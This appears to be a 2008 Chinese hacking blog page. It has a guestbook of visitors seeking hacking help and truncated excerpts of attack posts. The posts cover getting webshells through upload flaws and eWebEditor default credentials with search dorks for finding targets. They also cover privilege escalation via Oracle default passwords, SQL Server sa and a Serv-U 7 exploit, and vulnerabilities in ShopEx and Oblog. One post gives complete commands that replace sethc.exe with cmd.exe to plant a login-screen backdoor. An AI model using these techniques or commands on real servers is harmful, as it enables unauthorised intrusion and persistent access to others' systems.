Ice

留言板

给他留言

哥哥~~`我有比较麻烦的事。关于私服的，帮帮我好吗？非常感谢。加我QQ好吗？124965597

2008-06-02 11:50| 回复

哥哥加我QQ250957106 有事问问你好吗?

2008-04-29 06:40| 回复

你好问一下你能给我申请几个韩国DO游戏帐号吗? 万分感谢

2008-04-27 22:12| 回复

木JJ的家伙! 找留言板俺找了半天!
哇塞! 你黑客耶?
膜拜下牛淫!阿弥陀佛! 膜拜牛淫!阿弥陀佛! 膜拜牛淫!阿弥陀佛! 膜拜牛淫!
俺走了! 不用送我了.我开拖拉机来滴老有钱了! 天天吃方便面喝饮尿!!!

2008-03-25 17:56| 回复

我在等待大哥能和我真心的成为朋友啊!!!以心相带!!!

2008-03-21 10:52| 回复

留言(6条)>>

文章列表

利用ORACLE系统账户默认口令提升权限

2008-12-23 17:53

来源:网络
近日，偶到一主机上逛了一圈。主机的配置还算是安全，偏偏一个比较隐藏的目录下残留了upfile.asp，结果轻轻松松的得到了webshell。
接着在主机上逛了逛，拿出superscan从外面扫了下，只开放了80端口。从user\程序目录里，发现有一快捷方式：firecontrol，好象是某款硬件防火墙的控制台。WEBSHELL下检测了下开放的服务，发现一般的可提权的方法都不可行，无SERV-U等等，主机的补丁也是打到了最新。试了下传了个NC上去，反连接得到一SHELL，这下比在老兵的管理器里舒服多了。

在C盘下看到一个目录oracle，看

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

sa 无xp_cmdshell下取权限又一简单方法

2008-12-23 17:52

文章作者：charley008
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
（很多服务器都把'wscript.shell'给删了。）
看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

serv-u7 local exploit (php)

2008-12-23 17:51

by 空虚浪子心 http://www.inbreak.net
注：由于作者懒，没有提供日志清理功能，会留下日志：
一，su7是提权有几种方式？

有两种形式去干掉su7。
1>，登陆管理员控制台的页面
==>获取OrganizationId，用于添加用户
==>获取全局用户的“下一个新用户ID”
==>添加用户
==>添加用户的权限 or 添加全局用户权限
==>用户登陆
==>执行系统命令添加系统账

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

可怜那没空间了~~~~

2008-12-23 12:14

恢复sp_addextendedproc语句：
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
xp_cmdshell新的恢复办法(不用去管s

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

BLOG

2008-04-03 13:47

换地址了 www.xuejiice.cn

类别：默认分类 | 评论(0) | 浏览()

eWebEditor漏洞获webshell拿服务器全过程

2008-03-20 14:58

第一步，搜索攻击目标

　　打开搜索引擎，搜索“Pragram by Dlog”，可以找到许多博客页面，这些博客都是使用“Dlog破废墟修改版”建立的。我们要找的叶面是存在暴库漏洞的1.2版本。许多用户都忽视了这个版本中内

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

利用eWebEditor获得WebShell//eWebEditor漏洞获webshell拿服务器全过程//当ewebeditor数据库为只读时

2008-03-20 14:57

我靠今天纯属见鬼了。。。拿了个站的eWebEditor 居然上传文件有，但是你打开说该页无法显示

晕死

现在eWebSoft在线编辑器用户越来越多,危害就越来越大~
首先介绍编辑器的一些默认特征:
默认登陆admin_login.asp
默认数据库db/ewebeditor.mdb
默认帐号admin 密码admin或admin888

搜索关键字:"inurl:ewebeditor" 关键字十分重要
有人搜索"eWebEditor - eWebSoft在线编辑器"
根本搜索不到几个~

baidu.google搜索inurl:ewebeditor

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

ShopEx PHP远程包含漏洞

2008-03-19 15:52

影响版本：4.7及以下

verifycode.php

<?php
/**
*
* 登陆验证码生成文件
*
* @package ShopEx网上商店系统
* @version 4.6
* @author ShopEx.cn <develop@shopex.cn>
* @url http://www.shopex.cn/
* @since PHP 4.3
* @copyright ShopEx.cn
*
**/
if (!defined("ISSHOP

阅读全文>>

类别：默认分类 | 评论(1) | 浏览()

免密码进入服务器系统本身后门

2008-03-18 17:39

## LOOK ##

copy cmd.exe acmd.exe

copy sethc.exe asethc.exe

del sethc.exe

ren acmd.exe sethc.exe

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()

最新Oblog4.6注入漏洞分析之二

2008-03-15 08:13

Date：2008-2-15
Author：Yamato[BCT]
Version:Oblog 4.6

漏洞文件User_Address.asp： If oblog.l_Group(17,0)=0 Then //第4行有等级限制
oblog.AddErrStr ("您目前所属的等级不允许使用通讯录功能")
oblog.showUserErr
Response.End
End if
。。。。。。
addrId=Request("id") //第15行
If addrId<>"" And InStr(addrid,",")<=0 Then addrId=Int(addrId)
。。。。。。
Case "add","edit

阅读全文>>

类别：默认分类 | 评论(0) | 浏览()